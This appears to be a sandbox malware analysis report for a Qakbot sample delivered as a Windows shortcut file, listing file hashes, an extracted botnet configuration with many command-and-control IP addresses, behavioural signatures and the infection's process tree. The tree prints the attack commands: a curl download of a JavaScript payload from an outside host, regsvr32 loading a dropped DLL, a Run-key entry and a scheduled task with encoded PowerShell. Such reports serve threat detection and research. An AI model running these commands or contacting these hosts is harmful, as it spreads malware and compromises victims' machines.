Analysis
-
max time kernel
150s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
09-09-2022 16:40
Static task
static1
Behavioral task
behavioral1
Sample
Hiccorrupti188.lnk
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Hiccorrupti188.lnk
Resource
win10v2004-20220812-en
General
-
Target
Hiccorrupti188.lnk
-
Size
2KB
-
MD5
565d7da79e3da03b4f556f100955c10e
-
SHA1
2b4a629e7c6a74f7d72abe6522128b0db94a12d3
-
SHA256
2a49944b548ca919f6c05bac4434b359a0bc81422901ac3c80160e383c1813e6
-
SHA512
2a225d8a66ed416a7ed99aab6ad7a6cc0a44d4f3a1be1b2f5c38237598898b2f9099c67224a805953f95c9af620a6d991afd7fc5fd2f7286e6a7eb06a9928835
Malware Config
Extracted
qakbot
403.860
BB
1662650043
191.97.234.238:995
81.131.161.131:2078
197.94.210.133:443
193.3.19.37:443
70.51.153.182:2222
99.232.140.205:2222
123.240.131.1:443
177.102.84.28:32101
105.156.152.227:443
190.59.247.136:995
89.211.218.88:2222
81.214.220.237:443
85.99.62.74:443
217.165.68.122:993
219.69.103.199:443
37.210.148.30:995
64.207.215.69:443
113.169.57.104:443
179.225.221.169:32101
151.234.94.35:990
84.238.253.171:443
87.220.229.164:2222
42.118.158.96:443
61.105.45.244:443
27.73.215.46:32102
145.82.135.6:443
105.105.104.0:443
169.1.47.111:443
78.182.113.80:443
210.195.18.76:2222
113.53.59.10:995
88.246.170.2:443
95.10.13.82:443
171.248.157.128:995
118.68.220.199:443
139.195.63.45:2222
118.216.99.232:443
181.80.133.202:443
102.40.236.32:995
46.116.229.16:443
61.70.29.53:443
179.108.32.195:443
171.238.230.59:443
81.56.22.251:995
31.32.180.179:443
197.204.30.177:443
186.64.87.202:443
31.22.202.71:32101
120.150.218.241:995
173.189.167.21:995
24.139.72.117:443
104.34.212.7:32103
47.23.89.61:995
24.55.67.176:443
172.115.177.204:2222
217.165.77.134:995
24.178.196.158:2222
67.209.195.198:443
111.125.245.116:995
39.49.67.4:995
78.101.202.75:50010
37.34.253.233:443
217.165.77.134:443
46.107.48.202:443
70.46.220.114:443
63.143.92.99:995
93.48.80.198:995
179.158.103.236:443
47.180.172.159:443
47.23.89.61:993
72.252.157.93:995
182.191.92.203:995
187.172.230.151:443
72.252.157.93:990
24.158.23.166:995
32.221.224.140:995
41.84.238.19:443
41.228.22.180:443
197.167.27.20:993
45.46.53.140:2222
47.156.129.52:443
148.64.96.100:443
63.143.92.99:443
173.21.10.71:2222
66.230.104.103:443
76.25.142.196:443
100.38.242.113:995
208.107.221.224:443
197.89.12.179:443
39.44.34.119:995
196.203.37.215:80
39.57.40.50:995
117.248.109.38:21
121.7.223.38:2222
85.104.122.231:443
118.172.249.102:443
1.161.70.129:443
39.52.28.146:995
188.136.218.20:61202
212.70.96.76:995
1.161.70.129:995
174.69.215.101:443
69.14.172.24:443
86.213.191.206:2078
176.45.233.14:995
82.41.63.217:443
67.69.166.79:2222
217.164.237.54:2222
217.164.121.130:1194
39.41.114.133:995
100.38.242.113:443
120.61.3.17:443
101.50.120.124:995
217.128.122.65:2222
217.128.122.65:443
88.227.46.238:443
223.229.136.61:443
72.252.157.93:993
-
salt
SoNuce]ugdiB3c[doMuce2s81*uXmcvP
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
wscript.exeflow pid process 39 100 wscript.exe 40 100 wscript.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exewscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation wscript.exe -
Loads dropped DLL 2 IoCs
Processes:
regsvr32.exeregsvr32.exepid process 4732 regsvr32.exe 560 regsvr32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tpppwpjkv = "regsvr32.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Abbdcuz\\udcauhiovjyjxn.dll\"" explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
regsvr32.exeexplorer.exeregsvr32.exeexplorer.exepid process 4732 regsvr32.exe 4732 regsvr32.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 560 regsvr32.exe 560 regsvr32.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 3772 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe 4692 explorer.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
regsvr32.exeregsvr32.exepid process 4732 regsvr32.exe 560 regsvr32.exe -
Suspicious use of WriteProcessMemory 33 IoCs
Processes:
cmd.execmd.exewscript.execmd.exeregsvr32.exeregsvr32.exeexplorer.exeregsvr32.exedescription pid process target process PID 1220 wrote to memory of 3196 1220 cmd.exe cmd.exe PID 1220 wrote to memory of 3196 1220 cmd.exe cmd.exe PID 3196 wrote to memory of 4860 3196 cmd.exe PING.EXE PID 3196 wrote to memory of 4860 3196 cmd.exe PING.EXE PID 3196 wrote to memory of 4192 3196 cmd.exe curl.exe PID 3196 wrote to memory of 4192 3196 cmd.exe curl.exe PID 3196 wrote to memory of 100 3196 cmd.exe wscript.exe PID 3196 wrote to memory of 100 3196 cmd.exe wscript.exe PID 100 wrote to memory of 2712 100 wscript.exe cmd.exe PID 100 wrote to memory of 2712 100 wscript.exe cmd.exe PID 2712 wrote to memory of 4888 2712 cmd.exe PING.EXE PID 2712 wrote to memory of 4888 2712 cmd.exe PING.EXE PID 2712 wrote to memory of 3244 2712 cmd.exe regsvr32.exe PID 2712 wrote to memory of 3244 2712 cmd.exe regsvr32.exe PID 3244 wrote to memory of 4732 3244 regsvr32.exe regsvr32.exe PID 3244 wrote to memory of 4732 3244 regsvr32.exe regsvr32.exe PID 3244 wrote to memory of 4732 3244 regsvr32.exe regsvr32.exe PID 4732 wrote to memory of 3772 4732 regsvr32.exe explorer.exe PID 4732 wrote to memory of 3772 4732 regsvr32.exe explorer.exe PID 4732 wrote to memory of 3772 4732 regsvr32.exe explorer.exe PID 4732 wrote to memory of 3772 4732 regsvr32.exe explorer.exe PID 4732 wrote to memory of 3772 4732 regsvr32.exe explorer.exe PID 3772 wrote to memory of 1696 3772 explorer.exe schtasks.exe PID 3772 wrote to memory of 1696 3772 explorer.exe schtasks.exe PID 3772 wrote to memory of 1696 3772 explorer.exe schtasks.exe PID 3772 wrote to memory of 560 3772 explorer.exe regsvr32.exe PID 3772 wrote to memory of 560 3772 explorer.exe regsvr32.exe PID 3772 wrote to memory of 560 3772 explorer.exe regsvr32.exe PID 560 wrote to memory of 4692 560 regsvr32.exe explorer.exe PID 560 wrote to memory of 4692 560 regsvr32.exe explorer.exe PID 560 wrote to memory of 4692 560 regsvr32.exe explorer.exe PID 560 wrote to memory of 4692 560 regsvr32.exe explorer.exe PID 560 wrote to memory of 4692 560 regsvr32.exe explorer.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Hiccorrupti188.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /q /c echo 'a0' && ping 4j.org && MD "C:\Users\Admin\AppData\Roaming\HM\K86O6h" && echo "PH" && curl.exe --output C:\Users\Admin\AppData\Roaming\HM\K86O6h\tEZgi.tEY.QcZ.js https://matrixcommunication.net/s4Y/0.html && cd "C:\Users\Admin\AppData\Roaming\HM\K86O6h" && wscript tEZgi.tEY.QcZ.js2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping 4j.org3⤵
- Runs ping.exe
-
C:\Windows\system32\curl.execurl.exe --output C:\Users\Admin\AppData\Roaming\HM\K86O6h\tEZgi.tEY.QcZ.js https://matrixcommunication.net/s4Y/0.html3⤵
-
C:\Windows\system32\wscript.exewscript tEZgi.tEY.QcZ.js3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping go.com && regsvr32 _WSP.dll4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping go.com5⤵
- Runs ping.exe
-
C:\Windows\system32\regsvr32.exeregsvr32 _WSP.dll5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exe_WSP.dll6⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe7⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /Z /ST 18:43 /tn hdwsaacxjy /ET 18:54 /tr "powershell.exe -encodedCommand cgBlAGcAcwB2AHIAMwAyAC4AZQB4AGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABNAFwASwA4ADYATwA2AGgAXABfAFcAUwBQAC4AZABsAGwAIgA=" /SC ONCE8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe "C:\Users\Admin\AppData\Roaming\Microsoft\Abbdcuz\udcauhiovjyjxn.dll"8⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe9⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\HM\K86O6h\_WSP.dllFilesize
483KB
MD52d07b8c39bba8161ceda00ac1037fe5d
SHA1d8b4c7303779d36799b62b327747c204d89aa186
SHA256a04971254387e1f8d57c65fee5b3f3b13f011a2eb5698bc1877ec816fa978389
SHA512734cd479408b5f5c4f83896eb3e5b4e92d62aa82bd5b3e54d946a21b4ac783668e90de2eb62f22935b4469481a174482c16a41414810c3fcb9db5f8f93b112e7
-
C:\Users\Admin\AppData\Roaming\HM\K86O6h\_WSP.dllFilesize
483KB
MD52d07b8c39bba8161ceda00ac1037fe5d
SHA1d8b4c7303779d36799b62b327747c204d89aa186
SHA256a04971254387e1f8d57c65fee5b3f3b13f011a2eb5698bc1877ec816fa978389
SHA512734cd479408b5f5c4f83896eb3e5b4e92d62aa82bd5b3e54d946a21b4ac783668e90de2eb62f22935b4469481a174482c16a41414810c3fcb9db5f8f93b112e7
-
C:\Users\Admin\AppData\Roaming\HM\K86O6h\tEZgi.tEY.QcZ.jsFilesize
129KB
MD5c9ee9686734db73e4ffbd30d50497d16
SHA17b15fa41b28ecd9adfb400b1b4a560cacf0e8965
SHA256c759c5f4dc07ef25ab3a3606968e87274d9aa8772e8769bfccd0e9518fc0e1b9
SHA51245ef770a0e650147066641ff9c1e76305dd67984d18f667fda246f5a326f2a048b7477f1b74bfadcda3569051fb97cc3a467e051420c9865e6c7fad4458e03d4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Abbdcuz\udcauhiovjyjxn.dllFilesize
483KB
MD52d07b8c39bba8161ceda00ac1037fe5d
SHA1d8b4c7303779d36799b62b327747c204d89aa186
SHA256a04971254387e1f8d57c65fee5b3f3b13f011a2eb5698bc1877ec816fa978389
SHA512734cd479408b5f5c4f83896eb3e5b4e92d62aa82bd5b3e54d946a21b4ac783668e90de2eb62f22935b4469481a174482c16a41414810c3fcb9db5f8f93b112e7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Abbdcuz\udcauhiovjyjxn.dllFilesize
483KB
MD52d07b8c39bba8161ceda00ac1037fe5d
SHA1d8b4c7303779d36799b62b327747c204d89aa186
SHA256a04971254387e1f8d57c65fee5b3f3b13f011a2eb5698bc1877ec816fa978389
SHA512734cd479408b5f5c4f83896eb3e5b4e92d62aa82bd5b3e54d946a21b4ac783668e90de2eb62f22935b4469481a174482c16a41414810c3fcb9db5f8f93b112e7
-
memory/100-135-0x0000000000000000-mapping.dmp
-
memory/560-151-0x0000000001210000-0x0000000001232000-memory.dmpFilesize
136KB
-
memory/560-153-0x0000000001210000-0x0000000001232000-memory.dmpFilesize
136KB
-
memory/560-147-0x0000000000000000-mapping.dmp
-
memory/1696-146-0x0000000000000000-mapping.dmp
-
memory/2712-137-0x0000000000000000-mapping.dmp
-
memory/3196-132-0x0000000000000000-mapping.dmp
-
memory/3244-139-0x0000000000000000-mapping.dmp
-
memory/3772-150-0x00000000006B0000-0x00000000006D2000-memory.dmpFilesize
136KB
-
memory/3772-144-0x0000000000000000-mapping.dmp
-
memory/3772-154-0x00000000006B0000-0x00000000006D2000-memory.dmpFilesize
136KB
-
memory/4192-134-0x0000000000000000-mapping.dmp
-
memory/4692-152-0x0000000000000000-mapping.dmp
-
memory/4692-155-0x00000000006D0000-0x00000000006F2000-memory.dmpFilesize
136KB
-
memory/4692-156-0x00000000006D0000-0x00000000006F2000-memory.dmpFilesize
136KB
-
memory/4732-145-0x0000000000650000-0x0000000000672000-memory.dmpFilesize
136KB
-
memory/4732-143-0x0000000000650000-0x0000000000672000-memory.dmpFilesize
136KB
-
memory/4732-141-0x0000000000000000-mapping.dmp
-
memory/4860-133-0x0000000000000000-mapping.dmp
-
memory/4888-138-0x0000000000000000-mapping.dmp